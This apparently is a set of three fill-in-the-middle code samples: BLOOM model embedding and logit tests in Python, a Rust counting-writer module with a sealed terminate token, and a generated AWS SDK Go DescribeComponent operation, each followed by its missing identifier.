- https://huggingface.co/bigscience-catalogue-data-dev/byte-level-bpe-tokenizer-no-norm-250k-whitespace-and-eos-regex-alpha-v3-dedup-lines-articles
# TODO change the script (or just add skip) when building the env with tokenizers 0.12.0
"""
def setUp(self):
super().setUp()
self.path_bigscience_model = "bigscience/bigscience-small-testing"
@require_torch
def test_embeddings(self):
model = BloomForCausalLM.from_pretrained(self.path_bigscience_model, torch_dtype="auto") # load in fp32
model.eval()
EMBEDDINGS_DS_BEFORE_LN_BF_16_MEAN = {
3478: 0.0002307891845703125,
368: -0.000568389892578125,
109586: -0.0003910064697265625,
35433: -0.000194549560546875,
2: 0.0004138946533203125,
77: 0.000659942626953125,
132619: -0.00031280517578125,
2175: 0.000457763671875,
23714: 0.000263214111328125,
73173: -0.000286102294921875,
144252: 0.00052642822265625,
}
EMBEDDINGS_DS_BEFORE_LN_BF_16_MIN = {
3478: -0.00921630859375,
368: -0.010009765625,
109586: -0.01031494140625,
35433: -0.01177978515625,
2: -0.0074462890625,
77: -0.00848388671875,
132619: -0.009521484375,
2175: -0.0074462890625,
23714: -0.0145263671875,
73173: -0.007415771484375,
144252: -0.01007080078125,
}
EMBEDDINGS_DS_BEFORE_LN_BF_16_MAX = {
3478: 0.0128173828125,
368: 0.01214599609375,
109586: 0.0111083984375,
35433: 0.01019287109375,
2: 0.0157470703125,
77: 0.0174560546875,
132619: 0.0078125,
2175: 0.0113525390625,
23714: 0.0146484375,
73173: 0.01116943359375,
144252: 0.01141357421875,
}
EMBEDDINGS_DS_BEFORE_LN_BF_16_SUM = {"value": 0.08203125}
EMBEDDINGS_DS_BEFORE_LN_F_16_MEAN = {
132619: -0.00031256675720214844,
3478: 0.00023090839385986328,
368: -0.0005702972412109375,
109586: -0.00039124488830566406,
35433: -0.000194549560546875,
2: 0.0004146099090576172,
2175: 0.0004572868347167969,
23714: 0.00026416778564453125,
73173: -0.0002865791320800781,
144252: 0.0005254745483398438,
77: 0.0006618499755859375,
}
EMBEDDINGS_DS_BEFORE_LN_F_16_MIN = {
3478: -0.00921630859375,
368: -0.010009765625,
109586: -0.01031494140625,
35433: -0.01177978515625,
2: -0.0074462890625,
77: -0.00848388671875,
132619: -0.009521484375,
2175: -0.0074462890625,
23714: -0.0145263671875,
73173: -0.007415771484375,
144252: -0.01007080078125,
}
EMBEDDINGS_DS_BEFORE_LN_F_16_MAX = {
3478: 0.0128173828125,
368: 0.01214599609375,
109586: 0.0111083984375,
35433: 0.01019287109375,
2: 0.0157470703125,
77: 0.0174560546875,
132619: 0.0078125,
2175: 0.0113525390625,
23714: 0.0146484375,
73173: 0.01116943359375,
144252: 0.01141357421875,
}
EMBEDDINGS_DS_BEFORE_LN_F_16_SUM = {"value": 0.0821533203125}
EMBEDDINGS_DS_BEFORE_LN_F_32_MEAN = {
132619: -0.00031267106533050537,
3478: 0.00023087859153747559,
368: -0.0005701072514057159,
109586: -0.0003911703824996948,
35433: -0.0001944899559020996,
2: 0.0004146844148635864,
2175: 0.00045740045607089996,
23714: 0.0002641640603542328,
73173: -0.0002864748239517212,
144252: 0.0005256589502096176,
77: 0.0006617321632802486,
}
EMBEDDINGS_DS_BEFORE_LN_F_32_MIN = {
3478: -0.00921630859375,
368: -0.010009765625,
109586: -0.01031494140625,
35433: -0.01177978515625,
2: -0.0074462890625,
77: -0.00848388671875,
132619: -0.009521484375,
2175: -0.0074462890625,
23714: -0.0145263671875,
73173: -0.007415771484375,
144252: -0.01007080078125,
}
EMBEDDINGS_DS_BEFORE_LN_F_32_MAX = {
3478: 0.0128173828125,
368: 0.01214599609375,
109586: 0.0111083984375,
35433: 0.01019287109375,
2: 0.0157470703125,
77: 0.0174560546875,
132619: 0.0078125,
2175: 0.0113525390625,
23714: 0.0146484375,
73173: 0.01116943359375,
144252: 0.01141357421875,
}
EMBEDDINGS_DS_BEFORE_LN_F_32_SUM = {"value": 0.08217757940292358}
TEST_EMBEDDINGS = {
"torch.bfloat16": {
"mean": EMBEDDINGS_DS_BEFORE_LN_BF_16_MEAN,
"max": EMBEDDINGS_DS_BEFORE_LN_BF_16_MAX,
"min": EMBEDDINGS_DS_BEFORE_LN_BF_16_MIN,
"sum": EMBEDDINGS_DS_BEFORE_LN_BF_16_SUM,
},
"torch.float32": {
"mean": EMBEDDINGS_DS_BEFORE_LN_F_32_MEAN,
"max": EMBEDDINGS_DS_BEFORE_LN_F_32_MAX,
"min": EMBEDDINGS_DS_BEFORE_LN_F_32_MIN,
"sum": EMBEDDINGS_DS_BEFORE_LN_F_32_SUM,
},
"torch.float": {
"mean": EMBEDDINGS_DS_BEFORE_LN_F_32_MEAN,
"max": EMBEDDINGS_DS_BEFORE_LN_F_32_MAX,
"min": EMBEDDINGS_DS_BEFORE_LN_F_32_MIN,
"sum": EMBEDDINGS_DS_BEFORE_LN_F_32_SUM,
},
"torch.float16": {
"mean": EMBEDDINGS_DS_BEFORE_LN_F_16_MEAN,
"max": EMBEDDINGS_DS_BEFORE_LN_F_16_MAX,
"min": EMBEDDINGS_DS_BEFORE_LN_F_16_MIN,
"sum": EMBEDDINGS_DS_BEFORE_LN_F_16_SUM,
},
}
# fmt: off
EXAMPLE_IDS = [3478, 368, 109586, 35433, 2, 77, 132619, 3478, 368, 109586, 35433, 2, 2175, 23714, 73173, 144252, 2, 77, 132619, 3478]
# fmt: on
EMBEDDINGS_DS_AFTER_LN_MEAN = {
3478: -6.580352783203125e-05,
368: 0.0001316070556640625,
109586: -0.00030517578125,
35433: 4.00543212890625e-05,
2: -7.2479248046875e-05,
77: -8.96453857421875e-05,
132619: 0.0001583099365234375,
2175: 2.1219253540039062e-05,
23714: -0.000247955322265625,
73173: -0.00021839141845703125,
144252: -0.0001430511474609375,
}
EMBEDDINGS_DS_AFTER_LN_MIN = {
3478: -1.6953125,
368: -1.6875,
109586: -1.6875,
35433: -2.125,
2: -1.390625,
77: -1.5390625,
132619: -1.875,
2175: -1.4609375,
23714: -2.296875,
73173: -1.3515625,
144252: -1.78125,
}
EMBEDDINGS_DS_AFTER_LN_MAX = {
3478: 2.265625,
368: 2.28125,
109586: 1.953125,
35433: 1.90625,
2: 2.703125,
77: 2.828125,
132619: 1.65625,
2175: 2.015625,
23714: 2.234375,
73173: 2.171875,
144252: 1.828125,
}
EMBEDDINGS_DS_AFTER_LN = {
"mean": EMBEDDINGS_DS_AFTER_LN_MEAN,
"min": EMBEDDINGS_DS_AFTER_LN_MIN,
"max": EMBEDDINGS_DS_AFTER_LN_MAX,
}
tensor_ids = torch.LongTensor([EXAMPLE_IDS])
with torch.no_grad():
embeddings = model.transformer.word_embeddings(tensor_ids)
embeddings_ln = model.transformer.word_embeddings_layernorm(embeddings)
# first check the embeddings before LN
output_dict = {"min": {}, "max": {}, "mean": {}, "sum": {"value": embeddings.sum().item()}}
for i, idx in enumerate(EXAMPLE_IDS):
output_dict["min"][idx] = embeddings.min(dim=-1).values[0][i].item()
output_dict["max"][idx] = embeddings.max(dim=-1).values[0][i].item()
output_dict["mean"][idx] = embeddings.mean(dim=-1)[0][i].item()
for key in TEST_EMBEDDINGS[str(model.dtype)].keys():
self.assertDictEqual(TEST_EMBEDDINGS[str(model.dtype)][key], output_dict[key])
output_dict_norm = {"min": {}, "max": {}, "mean": {}}
for i, idx in enumerate(EXAMPLE_IDS):
output_dict_norm["min"][idx] = embeddings_ln.min(dim=-1).values[0][i].item()
output_dict_norm["max"][idx] = embeddings_ln.max(dim=-1).values[0][i].item()
output_dict_norm["mean"][idx] = embeddings_ln.mean(dim=-1)[0][i].item()
# This test does not pass when places = 2
for i, key in enumerate(output_dict_norm.keys()):
for j, idx in enumerate(output_dict[key].keys()):
self.assertAlmostEqual(EMBEDDINGS_DS_AFTER_LN[key][idx], output_dict_norm[key][idx], places=1)
@require_torch
def test_hidden_states_transformers(self):
cuda_available = torch.cuda.is_available()
model = BloomModel.from_pretrained(self.path_bigscience_model, use_cache=False, torch_dtype="auto").to(
torch_device
)
model.eval()
# fmt: off
EXAMPLE_IDS = [3478, 368, 109586, 35433, 2, 77, 132619, 3478, 368, 109586, 35433, 2, 2175, 23714, 73173, 144252, 2, 77, 132619, 3478]
# fmt: on
MEAN_VALUE_LAST_LM = -4.3392181396484375e-05
MIN_MAX_DICT = {"min": -2.0625, "max": 2.75}
tensor_ids = torch.LongTensor([EXAMPLE_IDS])
with torch.no_grad():
logits = model(tensor_ids.to(torch_device))
output_dict = {
"min": logits.last_hidden_state.min(dim=-1).values[0][0].item(),
"max": logits.last_hidden_state.max(dim=-1).values[0][0].item(),
}
if cuda_available:
self.assertAlmostEqual(MEAN_VALUE_LAST_LM, logits.last_hidden_state.mean().item(), places=4)
else:
self.assertAlmostEqual(MEAN_VALUE_LAST_LM, logits.last_hidden_state.mean().item(), places=3)
self.assertDictEqual(MIN_MAX_DICT, output_dict)
@require_torch
def test_logits(self):
cuda_available = torch.cuda.is_available()
model = BloomForCausalLM.from_pretrained(self.path_bigscience_model, use_cache=False, torch_dtype="auto").to(
torch_device
) # load in bf16
model.eval()
# fmt: off
EXAMPLE_IDS = [3478, 368, 109586, 35433, 2, 77, 132619, 3478, 368, 109586, 35433, 2, 2175, 23714, 73173, 144252, 2, 77, 132619, 3478]
# fmt: on
MEAN_LOGITS_GPU_1 = -1.823902130126953e-05
MEAN_LOGITS_GPU_2 = 1.9431114196777344e-05
tensor_ids = torch.LongTensor([EXAMPLE_IDS]).to(torch_device)
with torch.no_grad():
output = model(tensor_ids).logits
output_gpu_1, output_gpu_2 = output.split(125440, dim=-1)
if cuda_available:
self.assertEqual(output_gpu_1.mean().item(), MEAN_LOGITS_GPU_1)
self.assertEqual(output_gpu_2.mean().item(), MEAN_LOGITS_GPU_2)
else:
self.assertAlmostEqual(output_gpu_1.mean().item(), MEAN_LOGITS_GPU_1, places=6) # 1e-06 precision!!
self.assertAlmostEqual(output_gpu_2.mean().item(), MEAN_LOGITS_GPU_2, places=6)
|
test_batch_generation
|
writer.rs
|
use std::io::{self, BufWriter, Write};
pub struct CountingWriter<W> {
underlying: W,
written_bytes: u64,
}
impl<W: Write> CountingWriter<W> {
pub fn wrap(underlying: W) -> CountingWriter<W> {
CountingWriter {
underlying,
written_bytes: 0,
}
}
#[inline]
pub fn written_bytes(&self) -> u64 {
self.written_bytes
}
/// Returns the underlying write object.
/// Note that this method does not trigger any flushing.
#[inline]
pub fn finish(self) -> W {
self.underlying
}
}
impl<W: Write> Write for CountingWriter<W> {
#[inline]
fn write(&mut self, buf: &[u8]) -> io::Result<usize> {
let written_size = self.underlying.write(buf)?;
self.written_bytes += written_size as u64;
Ok(written_size)
}
#[inline]
fn write_all(&mut self, buf: &[u8]) -> io::Result<()> {
self.underlying.write_all(buf)?;
self.written_bytes += buf.len() as u64;
Ok(())
}
#[inline]
fn flush(&mut self) -> io::Result<()> {
self.underlying.flush()
}
}
impl<W: TerminatingWrite> TerminatingWrite for CountingWriter<W> {
#[inline]
fn
|
(&mut self, token: AntiCallToken) -> io::Result<()> {
self.underlying.terminate_ref(token)
}
}
/// Struct used to prevent calling [`terminate_ref`](trait.TerminatingWrite#method.terminate_ref) directly
///
/// The point is that while the type is public, it cannot be built by anyone
/// outside of this module.
pub struct AntiCallToken(());
/// Trait used to indicate that no more writes need to be done on a writer.
pub trait TerminatingWrite: Write {
/// Indicates that the writer will no longer be used. Internally calls `terminate_ref`.
fn terminate(mut self) -> io::Result<()>
where
Self: Sized,
{
self.terminate_ref(AntiCallToken(()))
}
/// You should implement this function to define custom behavior.
/// This function should flush any buffer it may hold.
fn terminate_ref(&mut self, _: AntiCallToken) -> io::Result<()>;
}
impl<W: TerminatingWrite + ?Sized> TerminatingWrite for Box<W> {
fn terminate_ref(&mut self, token: AntiCallToken) -> io::Result<()> {
self.as_mut().terminate_ref(token)
}
}
impl<W: TerminatingWrite> TerminatingWrite for BufWriter<W> {
fn terminate_ref(&mut self, a: AntiCallToken) -> io::Result<()> {
self.flush()?;
self.get_mut().terminate_ref(a)
}
}
impl<'a> TerminatingWrite for &'a mut Vec<u8> {
fn terminate_ref(&mut self, _a: AntiCallToken) -> io::Result<()> {
self.flush()
}
}
#[cfg(test)]
mod test {
use super::CountingWriter;
use std::io::Write;
#[test]
fn test_counting_writer() {
let buffer: Vec<u8> = vec![];
let mut counting_writer = CountingWriter::wrap(buffer);
let bytes = (0u8..10u8).collect::<Vec<u8>>();
counting_writer.write_all(&bytes).unwrap();
let len = counting_writer.written_bytes();
let buffer_restituted: Vec<u8> = counting_writer.finish();
assert_eq!(len, 10u64);
assert_eq!(buffer_restituted.len(), 10);
}
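// Editor's sketch (not part of the original file): exercises the sealed
// AntiCallToken pattern defined above. `terminate` consumes the writer and
// forwards to `terminate_ref`; callers outside this module cannot invoke
// `terminate_ref` directly because they cannot construct an `AntiCallToken`.
#[test]
fn test_terminate_counting_writer() {
use super::TerminatingWrite;
let mut buffer: Vec<u8> = vec![];
let mut counting_writer = CountingWriter::wrap(&mut buffer);
counting_writer.write_all(&[1u8, 2u8, 3u8]).unwrap();
counting_writer.terminate().unwrap(); // flushes via terminate_ref under the hood
assert_eq!(buffer, vec![1u8, 2u8, 3u8]);
}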
}
|
terminate_ref
|
api_op_DescribeComponent.go
|
// Code generated by smithy-go-codegen DO NOT EDIT.
package applicationinsights
import (
"context"
awsmiddleware "github.com/aws/aws-sdk-go-v2/aws/middleware"
"github.com/aws/aws-sdk-go-v2/aws/signer/v4"
"github.com/aws/aws-sdk-go-v2/service/applicationinsights/types"
"github.com/aws/smithy-go/middleware"
smithyhttp "github.com/aws/smithy-go/transport/http"
)
// Describes a component and lists the resources that are grouped together in a
// component.
func (c *Client) DescribeComponent(ctx context.Context, params *DescribeComponentInput, optFns ...func(*Options)) (*DescribeComponentOutput, error) {
if params == nil {
params = &DescribeComponentInput{}
}
result, metadata, err := c.invokeOperation(ctx, "DescribeComponent", params, optFns, c.addOperationDescribeComponentMiddlewares)
if err != nil {
return nil, err
}
out := result.(*DescribeComponentOutput)
out.ResultMetadata = metadata
return out, nil
}
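// Editor's note (hedged sketch, not generated code): a typical invocation of
// this operation, assuming a configured Client and the aws helper package
// (github.com/aws/aws-sdk-go-v2/aws); the names below are hypothetical.
//
//	out, err := client.DescribeComponent(ctx, &DescribeComponentInput{
//		ComponentName:     aws.String("my-component"),
//		ResourceGroupName: aws.String("my-resource-group"),
//	})
//	if err != nil {
//		// handle error
//	}
//	_ = out.ApplicationComponent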
type DescribeComponentInput struct {
// The name of the component.
//
// This member is required.
ComponentName *string
// The name of the resource group.
//
// This member is required.
ResourceGroupName *string
noSmithyDocumentSerde
}
type DescribeComponentOutput struct {
// Describes a standalone resource or similarly grouped resources that the
// application is made up of.
ApplicationComponent *types.ApplicationComponent
// The list of resource ARNs that belong to the component.
ResourceList []string
// Metadata pertaining to the operation's result.
ResultMetadata middleware.Metadata
noSmithyDocumentSerde
}
func (c *Client) addOperationDescribeComponentMiddlewares(stack *middleware.Stack, options Options) (err error) {
err = stack.Serialize.Add(&awsAwsjson11_serializeOpDescribeComponent{}, middleware.After)
if err != nil {
return err
}
err = stack.Deserialize.Add(&awsAwsjson11_deserializeOpDescribeComponent{}, middleware.After)
if err != nil {
return err
}
if err = addSetLoggerMiddleware(stack, options); err != nil {
return err
}
if err = awsmiddleware.AddClientRequestIDMiddleware(stack); err != nil {
return err
}
if err = smithyhttp.AddComputeContentLengthMiddleware(stack); err != nil {
return err
}
if err = addResolveEndpointMiddleware(stack, options); err != nil {
return err
}
if err = v4.AddComputePayloadSHA256Middleware(stack); err != nil {
return err
}
if err = addRetryMiddlewares(stack, options); err != nil {
return err
}
if err = addHTTPSignerV4Middleware(stack, options); err != nil {
return err
}
if err = awsmiddleware.AddRawResponseToMetadata(stack); err != nil {
return err
}
if err = awsmiddleware.AddRecordResponseTiming(stack); err != nil {
return err
}
if err = addClientUserAgent(stack); err != nil {
return err
}
if err = smithyhttp.AddErrorCloseResponseBodyMiddleware(stack); err != nil {
return err
}
if err = smithyhttp.AddCloseResponseBodyMiddleware(stack); err != nil {
return err
}
if err = addOpDescribeComponentValidationMiddleware(stack); err != nil {
return err
}
if err = stack.Initialize.Add(newServiceMetadataMiddleware_opDescribeComponent(options.Region), middleware.Before); err != nil {
return err
}
if err = addRequestIDRetrieverMiddleware(stack); err != nil {
return err
}
if err = addResponseErrorMiddleware(stack); err != nil {
return err
}
if err = addRequestResponseLogging(stack, options); err != nil {
return err
}
return nil
}
func
|
(region string) *awsmiddleware.RegisterServiceMetadata {
return &awsmiddleware.RegisterServiceMetadata{
Region: region,
ServiceID: ServiceID,
SigningName: "applicationinsights",
OperationName: "DescribeComponent",
}
}
|
newServiceMetadataMiddleware_opDescribeComponent
|